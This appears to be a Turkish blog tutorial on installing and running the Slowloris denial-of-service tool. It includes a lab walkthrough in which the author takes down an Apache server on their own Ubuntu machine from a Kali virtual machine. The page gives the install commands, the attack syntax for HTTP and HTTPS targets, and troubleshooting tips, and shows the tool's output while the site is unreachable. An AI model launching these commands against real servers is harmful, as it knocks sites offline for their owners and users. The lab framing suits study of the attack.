| Slowloris Kurulum ve Kullanımı | |||||
a. Kurulumu
(*) Not:
Slowloris aracı github’dan indirilmiş klasör halinde Downloads klasörü altında yer almakta: slowloris-master.zip git clone https://github.com/gkbrk/slowloris.git chmod -R 777 slowloris/ cd slowloris python3 slowloris.py --helpveya sudo su apt-get install python3-pip pip3 install slowloris slowloris --help b. Kullanımı
(-) Uyarı:
Tool’a adres eklerken http veya https öneki adreste belirtilmemeli. Aksi takdirde tool çalışmıyor ve socket count çıktısı hep 0 veriyor. Belirtilmediğinde socket count default değeri 150 veriyor ve çalışıyor. Tool default olarak port 80’e paket gönderimi yapılıyor. Eğer site https ise --https parametresi eklenmeli. SSL modulü çıktıda belirttiği gibi import ediyor. Port parametresi için de 443 ilave olarak eklenebilir. python3 slowloris.py example.com python3 slowloris.py -p 443 --https example.com c. Uygulama (+) Birebir denendi ve başarıyla uygulandı. Gereksinimler
Ubuntu 18.04 LTS - Apache // Hedef : Ana Makine
Tubitak Kali (Ekim, 2020) - Slowloris // Saldırı: Sanal Makine Ubuntu 18.04 LTS ana makinesindeki apache sunucuya Kali Tubitak sanal makinesinden slowloris aracı ile slowloris saldırısı uygulanacaktır.
Kali Tubitak:
// İndirme git clone https://github.com/gkbrk/slowloris.git chmod -R 777 slowloris/ cd slowloris // Çalıştırma python3 slowloris.py 192.168.0.15 // Ubuntu 18.04 LTS IP’si Çıktı: [16-07-2021 18:06:44] Attacking 192.168.0.15 with 150 sockets. [16-07-2021 18:06:44] Creating sockets... (-) UYARI : Eğer saldırıyı şu şekilde başlatırsak saldırı başarısız oluyor. python3 slowloris.py http://192.168.0.15 Apache sunucu hiç etkilenmiyor ve çıktıda socket count : 0 olarak yansıyor. http:// veya https:// ön eki belirtmeden direk domain adı (veya ip’si) girilmeli. Saldırı başladığında ubuntu 18.04 lts ana makinesindeki apache sunucunun web erişimi kopacaktır.
Ubuntu 18.04 LTS Chrome:
// Erişim Denemesi http://localhost Çıktı: (~) Yükleniyor... Saldırı sonlandırıldığında erişim geliyor.
Kali Tubitak:
// Durdurma python3 slowloris.py 192.168.0.15 Çıktı: [16-07-2021 18:06:44] Attacking 192.168.0.15 with 150 sockets. [16-07-2021 18:06:44] Creating sockets... [16-07-2021 18:06:48] Sending keep-alive headers… Socket count: 150 ... ... C^ Ubuntu 18.04 LTS Chrome: // Erişim Denemesi http://localhost Çıktı: ... ... // Apache sunucudaki kök dizinde yer alan dizinler ve dosyalar ekrana gelir. ... Yararlanılan Kaynaklar:
|
|||||
Bu yazı 18.03.2026 tarihinde, saat 13:52:39'de yazılmıştır.
18.03.2026 tarihi ve 11:11:12 saatinde ise güncellenmiştir. |
|||||
|
|||||
| Yorumlar |
|||||
| Henüz yorum girilmemiştir. | |||||
| Yorum Ekle | |||||
Bu yazı 18.03.2026 tarihinde, saat 13:52:39'de yazılmıştır.
18.03.2026 tarihi ve 11:11:12 saatinde ise güncellenmiştir.